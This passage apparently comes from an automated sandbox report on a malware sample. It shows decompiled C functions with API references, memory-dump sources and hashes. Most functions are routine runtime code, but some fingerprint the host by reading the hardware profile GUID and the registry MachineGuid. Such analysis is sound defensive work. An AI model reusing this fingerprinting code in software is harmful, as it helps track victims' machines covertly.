                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree_memset
                                                                                • String ID:
                                                                                • API String ID: 577486340-0
                                                                                • Opcode ID: 81e1b6dfd243f5df8ce09643b92863d98a6d5bbd2c00aeb03bb3bd9d33ddcaa0
                                                                                • Instruction ID: d7e502bdde5aa826ca195f459ec9796bc4ec950c9a7d352dff936d21666a0c4f
                                                                                • Opcode Fuzzy Hash: 81e1b6dfd243f5df8ce09643b92863d98a6d5bbd2c00aeb03bb3bd9d33ddcaa0
                                                                                • Instruction Fuzzy Hash: 0BE02BB638132033E12421253C9DFBB8A9C9782F75F311029F608E73D0D9258D0891F8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 660 403cac-403cb4 661 403cc0-403cc5 660->661 662 403cb6-403cbb call 41d3b9 660->662 664 403cd2-403cd8 661->664 665 403cc7-403ccb call 403f24 661->665 662->661 666 403cf2-403cf4 664->666 667 403cda-403cdd 664->667 672 403cd0 665->672 670 403d02-403d0b 666->670 671 403cf6-403cfc 666->671 667->666 669 403cdf-403ce4 667->669 673 403ce6 669->673 674 403ce8-403cf0 call 402c34 669->674 675 403d00 671->675 676 403cfe 671->676 672->670 673->674 674->670 675->670 676->675
                                                                                C-Code - Quality: 89%
                                                                                			E00403CAC(void* __ebx, char* __ecx, void* __edi, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
                                                                                				void* __esi;
                                                                                				intOrPtr _t7;
                                                                                				intOrPtr _t10;
                                                                                				void* _t14;
                                                                                				char* _t15;
                                                                                				void* _t17;
                                                                                				intOrPtr _t18;
                                                                                
                                                                                				_t17 = __edi;
                                                                                				_t15 = __ecx;
                                                                                				_t14 = __ebx;
                                                                                				_t18 = _a4;
                                                                                				if(_t18 > 0xfffffffe) {
                                                                                					E0041D3B9("string too long");
                                                                                				}
                                                                                				_t7 =  *((intOrPtr*)(_t15 + 0x14));
                                                                                				_t21 = _t7 - _t18;
                                                                                				if(_t7 >= _t18) {
                                                                                					__eflags = _a8;
                                                                                					if(_a8 == 0) {
                                                                                						L9:
                                                                                						__eflags = _t18;
                                                                                						if(_t18 == 0) {
                                                                                							 *((intOrPtr*)(_t15 + 0x10)) = 0;
                                                                                							__eflags = _t7 - 0x10;
                                                                                							if(_t7 >= 0x10) {
                                                                                								_t15 =  *_t15;
                                                                                							}
                                                                                							 *_t15 = 0;
                                                                                						}
                                                                                						goto L13;
                                                                                					}
                                                                                					__eflags = _t18 - 0x10;
                                                                                					if(_t18 >= 0x10) {
                                                                                						goto L9;
                                                                                					}
                                                                                					_t10 =  *((intOrPtr*)(_t15 + 0x10));
                                                                                					__eflags = _t18 - _t10;
                                                                                					if(_t18 < _t10) {
                                                                                						_t10 = _t18;
                                                                                					}
                                                                                					E00402C34(_t15, 1, _t10);
                                                                                					goto L13;
                                                                                				} else {
                                                                                					_push( *((intOrPtr*)(_t15 + 0x10)));
                                                                                					_push(_t18); // executed
                                                                                					E00403F24(_t14, _t15, _t17, _t18, _t21); // executed
                                                                                					L13:
                                                                                					asm("sbb eax, eax");
                                                                                					return  ~0x00000000;
                                                                                				}
                                                                                			}










                                                                                0x00403cac
                                                                                0x00403cac
                                                                                0x00403cac
                                                                                0x00403cad
                                                                                0x00403cb4
                                                                                0x00403cbb
                                                                                0x00403cbb
                                                                                0x00403cc0
                                                                                0x00403cc3
                                                                                0x00403cc5
                                                                                0x00403cd4
                                                                                0x00403cd8
                                                                                0x00403cf2
                                                                                0x00403cf2
                                                                                0x00403cf4
                                                                                0x00403cf6
                                                                                0x00403cf9
                                                                                0x00403cfc
                                                                                0x00403cfe
                                                                                0x00403cfe
                                                                                0x00403d00
                                                                                0x00403d00
                                                                                0x00000000
                                                                                0x00403cf4
                                                                                0x00403cda
                                                                                0x00403cdd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403cdf
                                                                                0x00403ce2
                                                                                0x00403ce4
                                                                                0x00403ce6
                                                                                0x00403ce6
                                                                                0x00403ceb
                                                                                0x00000000
                                                                                0x00403cc7
                                                                                0x00403cc7
                                                                                0x00403cca
                                                                                0x00403ccb
                                                                                0x00403d02
                                                                                0x00403d06
                                                                                0x00403d0b
                                                                                0x00403d0b

                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403CBB
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3CE
                                                                                  • Part of subcall function 0041D3B9: __CxxThrowException@8.LIBCMT ref: 0041D3E3
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 1823113695-2556327735
                                                                                • Opcode ID: 617198cd35c81ecbde207c87ea40381cf19947083c991cb6268b74cc60b7e0dc
                                                                                • Instruction ID: 1c46651bd9e8eac6a21a0af06d38fdbeba248ee9fec2936164a89de7e55ab72b
                                                                                • Opcode Fuzzy Hash: 617198cd35c81ecbde207c87ea40381cf19947083c991cb6268b74cc60b7e0dc
                                                                                • Instruction Fuzzy Hash: 47F04C3150D1205EEB14AE29594166E3E49BF42705B304C7BF4A2FF2C2C239CD42438E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 679 415c16-415c4c GetCurrentHwProfileA 680 415c54 679->680 681 415c4e-415c52 679->681 682 415c59-415c6c call 40381a call 41deb4 680->682 681->682
                                                                                C-Code - Quality: 58%
                                                                                			E00415C16(intOrPtr __edi, intOrPtr __esi) {
                                                                                				signed int _v8;
                                                                                				struct tagHW_PROFILE_INFOA _v132;
                                                                                				char _v136;
                                                                                				void* __ebx;
                                                                                				signed int _t8;
                                                                                				int _t11;
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr _t20;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				signed int _t23;
                                                                                
                                                                                				_t22 = __esi;
                                                                                				_t21 = __edi;
                                                                                				_t8 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t8 ^ _t23;
                                                                                				_v136 = 0;
                                                                                				_t11 = GetCurrentHwProfileA( &_v132); // executed
                                                                                				 *((intOrPtr*)(__esi + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                                                				_t17 = __esi;
                                                                                				 *((char*)(__esi)) = 0;
                                                                                				if(_t11 == 0) {
                                                                                					_push("Unknown");
                                                                                				} else {
                                                                                					_push( &(_v132.szHwProfileGuid));
                                                                                				}
                                                                                				E0040381A(_t17);
                                                                                				return E0041DEB4(_t22, 0, _v8 ^ _t23, _t20, _t21, _t22);
                                                                                			}














                                                                                0x00415c16
                                                                                0x00415c16
                                                                                0x00415c1f
                                                                                0x00415c26
                                                                                0x00415c30
                                                                                0x00415c36
                                                                                0x00415c3c
                                                                                0x00415c43
                                                                                0x00415c46
                                                                                0x00415c48
                                                                                0x00415c4c
                                                                                0x00415c54
                                                                                0x00415c4e
                                                                                0x00415c51
                                                                                0x00415c51
                                                                                0x00415c59
                                                                                0x00415c6c

                                                                                APIs
                                                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 00415C36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentProfile
                                                                                • String ID: Unknown
                                                                                • API String ID: 2104809126-1654365787
                                                                                • Opcode ID: a2c18ba638635f137e384228a3320759b554aa98f7f1ddcf5dc983d42d67e498
                                                                                • Instruction ID: d6ff0abc5e520b43afe58a73493781b3fc12dee2e87154433b7c2203809e5786
                                                                                • Opcode Fuzzy Hash: a2c18ba638635f137e384228a3320759b554aa98f7f1ddcf5dc983d42d67e498
                                                                                • Instruction Fuzzy Hash: 71F08970B00709DBDB10DFB9D981699B7F8BF08709F50447ED142D7241DB7499088B95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 687 403f24-403f3e call 4219a8 690 403f40-403f43 687->690 691 403f45-403f5c 687->691 692 403f6c-403f76 call 40406b 690->692 691->692 693 403f5e-403f67 691->693 696 403f7b-403fae 692->696 693->692 694 403f69 693->694 694->692 698 403fb0-403fb4 696->698 699 403fc9-403fe2 call 402c34 696->699 701 403fb6-403fb8 698->701 702 403fba 698->702 705 403fe4 699->705 706 403fe6-403fef call 421a4d 699->706 704 403fbc-403fc6 call 421230 701->704 702->704 704->699 705->706
                                                                                C-Code - Quality: 93%
                                                                                			E00403F24(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				signed int _t30;
                                                                                				signed int _t32;
                                                                                				signed int _t34;
                                                                                				signed int _t39;
                                                                                				intOrPtr _t40;
                                                                                				unsigned int _t42;
                                                                                				unsigned int _t48;
                                                                                				signed int _t51;
                                                                                				signed int _t53;
                                                                                				void* _t54;
                                                                                
                                                                                				_push(0xc);
                                                                                				E004219A8(E00435C78, __ebx, __edi, __esi);
                                                                                				_t53 = __ecx;
                                                                                				 *((intOrPtr*)(_t54 - 0x18)) = __ecx;
                                                                                				_t51 =  *(_t54 + 8) | 0x0000000f;
                                                                                				if(_t51 <= 0xfffffffe) {
                                                                                					_t39 = 3;
                                                                                					_t42 =  *(__ecx + 0x14);
                                                                                					 *(_t54 - 0x14) = _t42;
                                                                                					 *(_t54 - 0x14) =  *(_t54 - 0x14) >> 1;
                                                                                					_t48 =  *(_t54 - 0x14);
                                                                                					if(_t48 > _t51 / _t39) {
                                                                                						_t51 = 0xfffffffe;
                                                                                						if(_t42 <= _t51 - _t48) {
                                                                                							_t51 = _t48 + _t42;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t51 =  *(_t54 + 8);
                                                                                				}
                                                                                				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
                                                                                				_t16 = _t51 + 1; // 0xff
                                                                                				_push(0);
                                                                                				_t30 = E0040406B(_t51, _t53, _t16); // executed
                                                                                				 *(_t54 + 8) = _t30;
                                                                                				_t40 =  *((intOrPtr*)(_t54 + 0xc));
                                                                                				if(_t40 != 0) {
                                                                                					if( *(_t53 + 0x14) < 0x10) {
                                                                                						_t34 = _t53;
                                                                                					} else {
                                                                                						_t34 =  *_t53;
                                                                                					}
                                                                                					E00421230( *(_t54 + 8), _t34, _t40);
                                                                                				}
                                                                                				E00402C34(_t53, 1, 0);
                                                                                				_t32 =  *(_t54 + 8);
                                                                                				 *_t53 = _t32;
                                                                                				 *(_t53 + 0x14) = _t51;
                                                                                				 *((intOrPtr*)(_t53 + 0x10)) = _t40;
                                                                                				if(_t51 < 0x10) {
                                                                                					_t32 = _t53;
                                                                                				}
                                                                                				 *((char*)(_t32 + _t40)) = 0;
                                                                                				return E00421A4D(_t32);
                                                                                			}













                                                                                0x00403f24
                                                                                0x00403f2b
                                                                                0x00403f30
                                                                                0x00403f32
                                                                                0x00403f38
                                                                                0x00403f3e
                                                                                0x00403f4b
                                                                                0x00403f4e
                                                                                0x00403f51
                                                                                0x00403f54
                                                                                0x00403f57
                                                                                0x00403f5c
                                                                                0x00403f60
                                                                                0x00403f67
                                                                                0x00403f69
                                                                                0x00403f69
                                                                                0x00403f67
                                                                                0x00403f40
                                                                                0x00403f40
                                                                                0x00403f40
                                                                                0x00403f6c
                                                                                0x00403f70
                                                                                0x00403f73
                                                                                0x00403f76
                                                                                0x00403f7d
                                                                                0x00403fa9
                                                                                0x00403fae
                                                                                0x00403fb4
                                                                                0x00403fba
                                                                                0x00403fb6
                                                                                0x00403fb6
                                                                                0x00403fb6
                                                                                0x00403fc1
                                                                                0x00403fc6
                                                                                0x00403fcf
                                                                                0x00403fd4
                                                                                0x00403fd7
                                                                                0x00403fd9
                                                                                0x00403fdc
                                                                                0x00403fe2
                                                                                0x00403fe4
                                                                                0x00403fe4
                                                                                0x00403fe6
                                                                                0x00403fef

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_catch_memmove
                                                                                • String ID:
                                                                                • API String ID: 3914490576-0
                                                                                • Opcode ID: bcd812267cdec8370236befbb77559b440871960d1f1a928b07e98a58a7e672f
                                                                                • Instruction ID: 8a178f20502620d6e08465528b5dfc8f4163f6dc24cd2f819fa24208c9268523
                                                                                • Opcode Fuzzy Hash: bcd812267cdec8370236befbb77559b440871960d1f1a928b07e98a58a7e672f
                                                                                • Instruction Fuzzy Hash: 1411E171F042069BEB24DF28D84072EBBBAAB94711F20452FF445BB3C1C7B4AA408799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 711 414ea2-414edb call 41eb16 714 414ef2 711->714 715 414edd call 41d9c9 711->715 716 414ef4-414f0f call 414fcb 714->716 719 414ee2-414ef0 call 41d788 call 40f13e 715->719 723 414f11-414f16 call 4143b2 716->723 724 414f1b-414f1d 716->724 719->716 723->724
                                                                                C-Code - Quality: 88%
                                                                                			E00414EA2(void* __esi, void* __ebp, void* __eflags, intOrPtr _a8) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				char _t20;
                                                                                				intOrPtr _t22;
                                                                                				void* _t25;
                                                                                				intOrPtr* _t26;
                                                                                				void* _t29;
                                                                                				void* _t31;
                                                                                
                                                                                				_t31 = __esi;
                                                                                				 *((intOrPtr*)(__esi + 0x30)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x14)) = 0x201;
                                                                                				 *((intOrPtr*)(__esi + 0x18)) = 6;
                                                                                				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x20)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x24)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x28)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0xc)) = 0;
                                                                                				_t26 = E0041EB16(_t25, _t29, 0, __esi, __eflags, 4);
                                                                                				_pop(_t27);
                                                                                				_t34 = _t26;
                                                                                				if(_t26 == 0) {
                                                                                					_t26 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					_t22 = E0041D9C9(_t26, 0, __esi, _t34); // executed
                                                                                					 *_t26 = _t22;
                                                                                					_t27 = E0041D788();
                                                                                					E0040F13E(_t23);
                                                                                				}
                                                                                				_push(0x20);
                                                                                				_push(_t31);
                                                                                				 *((intOrPtr*)(_t31 + 0x30)) = _t26;
                                                                                				 *((intOrPtr*)(_t31 + 0x38)) = _a8;
                                                                                				 *((intOrPtr*)(_t31 + 0x3c)) = 0;
                                                                                				_t20 = E00414FCB(_t26, _t27, 0, _t31, _t34);
                                                                                				 *((char*)(_t31 + 0x40)) = _t20;
                                                                                				if( *((intOrPtr*)(_t31 + 0x38)) == 0) {
                                                                                					return E004143B2(4, 0);
                                                                                				}
                                                                                				return _t20;
                                                                                			}











                                                                                0x00414ea2
                                                                                0x00414ea8
                                                                                0x00414eab
                                                                                0x00414eae
                                                                                0x00414eb1
                                                                                0x00414eb8
                                                                                0x00414ebf
                                                                                0x00414ec2
                                                                                0x00414ec5
                                                                                0x00414ec8
                                                                                0x00414ecb
                                                                                0x00414ece
                                                                                0x00414ed6
                                                                                0x00414ed8
                                                                                0x00414ed9
                                                                                0x00414edb
                                                                                0x00414ef2
                                                                                0x00414ef2
                                                                                0x00414edd
                                                                                0x00414edd
                                                                                0x00414ee2
                                                                                0x00414ee9
                                                                                0x00414eeb
                                                                                0x00414eeb
                                                                                0x00414ef8
                                                                                0x00414efa
                                                                                0x00414efb
                                                                                0x00414efe
                                                                                0x00414f01
                                                                                0x00414f04
                                                                                0x00414f09
                                                                                0x00414f0f
                                                                                0x00000000
                                                                                0x00414f16
                                                                                0x00414f1d

                                                                                APIs
                                                                                  • Part of subcall function 0041EB16: _malloc.LIBCMT ref: 0041EB30
                                                                                • std::locale::_Init.LIBCPMT ref: 00414EDD
                                                                                  • Part of subcall function 0041D9C9: __EH_prolog3.LIBCMT ref: 0041D9D0
                                                                                  • Part of subcall function 0041D9C9: std::_Lockit::_Lockit.LIBCPMT ref: 0041D9E6
                                                                                  • Part of subcall function 0041D9C9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0041DA08
                                                                                  • Part of subcall function 0041D9C9: std::locale::_Setgloballocale.LIBCPMT ref: 0041DA12
                                                                                  • Part of subcall function 0041D9C9: _Yarn.LIBCPMT ref: 0041DA28
                                                                                  • Part of subcall function 0041D9C9: std::locale::facet::_Incref.LIBCPMT ref: 0041DA35
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 00414EEB
                                                                                  • Part of subcall function 0040F13E: std::_Lockit::_Lockit.LIBCPMT ref: 0040F14A
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::locale::_$IncrefLockitLockit::_std::_std::locale::facet::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
                                                                                • String ID:
                                                                                • API String ID: 3761783024-0
                                                                                • Opcode ID: 2814a1ef4c0dff3bb9b9631679d8e90038e36d2f9e4ee7de47969a0cd22b2b8b
                                                                                • Instruction ID: 36576c7fc89020b0ecd9f1e70a3733df5921522e4f5e67ad96fb27b335124f54
                                                                                • Opcode Fuzzy Hash: 2814a1ef4c0dff3bb9b9631679d8e90038e36d2f9e4ee7de47969a0cd22b2b8b
                                                                                • Instruction Fuzzy Hash: B3010CB0A00B009FC3309F6B918565BFAF8BFD4714B104A2FE28686E51D7B9A4858B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 728 40406b-404076 729 4040b0-4040b1 728->729 730 404078-40407c 728->730 731 40408b-4040ab call 41e15e call 421126 730->731 732 40407e-404081 call 41eb16 730->732 731->729 735 404086-404089 732->735 735->729 735->731
                                                                                C-Code - Quality: 58%
                                                                                			E0040406B(void* __edi, void* __esi, signed int _a4) {
                                                                                				char _v16;
                                                                                				void* _t10;
                                                                                				void* _t15;
                                                                                				void* _t18;
                                                                                
                                                                                				_t10 = 0;
                                                                                				if(_a4 > 0) {
                                                                                					_t24 = _a4 - 0xffffffff;
                                                                                					if(_a4 > 0xffffffff) {
                                                                                						L3:
                                                                                						_a4 = _a4 & 0x00000000;
                                                                                						E0041E15E( &_v16,  &_a4);
                                                                                						_v16 = 0x43834c;
                                                                                						return E00421126( &_v16, 0x4441e0);
                                                                                					}
                                                                                					_t10 = E0041EB16(_t15, _t18, __edi, __esi, _t24, _a4); // executed
                                                                                					if(0 == 0) {
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				return _t10;
                                                                                			}







                                                                                0x0040406e
                                                                                0x00404076
                                                                                0x00404078
                                                                                0x0040407c
                                                                                0x0040408b
                                                                                0x0040408b
                                                                                0x00404096
                                                                                0x004040a4
                                                                                0x00000000
                                                                                0x004040ab
                                                                                0x00404081
                                                                                0x00404089
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404089
                                                                                0x004040b1

                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 00404096
                                                                                • __CxxThrowException@8.LIBCMT ref: 004040AB
                                                                                  • Part of subcall function 0041EB16: _malloc.LIBCMT ref: 0041EB30
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 4063778783-0
                                                                                • Opcode ID: 229ca0dfbd837ccbfc73e429b95277c81b705108bb3430ffb820af9b12988eee
                                                                                • Instruction ID: db3c686d204560470709e76104daf21eafb2fff72d3bc04e1d1d98e8c19dfb25
                                                                                • Opcode Fuzzy Hash: 229ca0dfbd837ccbfc73e429b95277c81b705108bb3430ffb820af9b12988eee
                                                                                • Instruction Fuzzy Hash: FDE06574900209AADF10EF71D841ACE7BBC9B003A8F10C23BFE14A52C1DB78D6848A99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 89%
                                                                                			E0041551F(intOrPtr __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				void* _t29;
                                                                                				void* _t30;
                                                                                				void* _t31;
                                                                                				void* _t34;
                                                                                				intOrPtr _t44;
                                                                                				void* _t45;
                                                                                				intOrPtr _t56;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t73;
                                                                                				signed int _t74;
                                                                                				void* _t76;
                                                                                
                                                                                				_t56 = __edx;
                                                                                				_t45 = __ecx;
                                                                                				_t74 = _t76 - 0x88;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				 *(_t74 + 0x8c) = _t24 ^ _t74;
                                                                                				E00421975(E004365E6, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t74 - 0x10)) = 0;
                                                                                				 *((intOrPtr*)(__ebx + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(__ebx + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t74 - 0x14)) = __ebx;
                                                                                				 *((char*)(__ebx)) = 0;
                                                                                				 *((intOrPtr*)(_t74 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t74 - 0x10)) = 1;
                                                                                				_t29 = E00415C16(1, _t74 + 0x1c); // executed
                                                                                				 *((intOrPtr*)(_t74 - 4)) = 1;
                                                                                				_t30 = E0040C689(_t45, _t74, _t29, 0x14, 0x11);
                                                                                				 *((char*)(_t74 - 4)) = 2;
                                                                                				_t31 = E00415C6D(_t30, _t74 + 0x38);
                                                                                				 *((char*)(_t74 - 4)) = 3;
                                                                                				E0040C689(_t45, _t74 + 0x70, _t31, 0, 0x18);
                                                                                				 *((char*)(_t74 - 4)) = 4;
                                                                                				_t34 = E0040D431(_t30, _t74 + 0x54);
                                                                                				 *((char*)(_t74 - 4)) = 5;
                                                                                				E0040CFB8(__ebx, _t34);
                                                                                				E00402C34(_t74 + 0x54, 1, 0);
                                                                                				E00402C34(_t74 + 0x70, 1, 0);
                                                                                				E00402C34(_t74 + 0x38, 1, 0);
                                                                                				E00402C34(_t74, 1, 0);
                                                                                				E00402C34(_t74 + 0x1c, 1, 0);
                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t74 - 0xc));
                                                                                				_t64 = 8;
                                                                                				_pop(_t73);
                                                                                				_pop(_t44);
                                                                                				return E0041DEB4(__ebx, _t44,  *(_t74 + 0x8c) ^ _t74, _t56, _t64, _t73);
                                                                                			}
















                                                                                0x0041551f
                                                                                0x0041551f
                                                                                0x00415526
                                                                                0x0041552a
                                                                                0x00415531
                                                                                0x0041553e
                                                                                0x00415545
                                                                                0x00415548
                                                                                0x0041554f
                                                                                0x00415552
                                                                                0x00415555
                                                                                0x00415559
                                                                                0x00415560
                                                                                0x00415563
                                                                                0x00415570
                                                                                0x00415573
                                                                                0x0041557d
                                                                                0x00415581
                                                                                0x0041558e
                                                                                0x00415592
                                                                                0x0041559e
                                                                                0x004155a2
                                                                                0x004155ab
                                                                                0x004155af
                                                                                0x004155be
                                                                                0x004155c8
                                                                                0x004155d2
                                                                                0x004155dc
                                                                                0x004155e6
                                                                                0x004155f0
                                                                                0x004155f8
                                                                                0x004155f9
                                                                                0x004155fa
                                                                                0x0041560f

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0041553E
                                                                                  • Part of subcall function 00415C16: GetCurrentHwProfileA.ADVAPI32(?), ref: 00415C36
                                                                                  • Part of subcall function 00415C6D: _memset.LIBCMT ref: 00415CA8
                                                                                  • Part of subcall function 00415C6D: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00415CC4
                                                                                  • Part of subcall function 00415C6D: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,?,?), ref: 00415CE3
                                                                                  • Part of subcall function 00415C6D: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00415CEC
                                                                                  • Part of subcall function 00415C6D: CharToOemA.USER32(?,?), ref: 00415CFD
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$CharCloseCurrentH_prolog3OpenProfileQueryValue_memset
                                                                                • String ID:
                                                                                • API String ID: 577691565-0
                                                                                • Opcode ID: 5fb9192717c7d80a9e6b2954902b3fde48ad56a2556d0363fffb32aaa6829de8
                                                                                • Instruction ID: e5420425b49f5e71cfc94671cbb469105b6df6a91cd3b079332353f26e2a2dbc
                                                                                • Opcode Fuzzy Hash: 5fb9192717c7d80a9e6b2954902b3fde48ad56a2556d0363fffb32aaa6829de8
                                                                                • Instruction Fuzzy Hash: D521CE72901258EADB24EF66DD41BDF7BB4AF95304F00402EBC05A72C2DA785B09C7A4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E00417463(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t42;
                                                                                				intOrPtr _t56;
                                                                                				void* _t59;
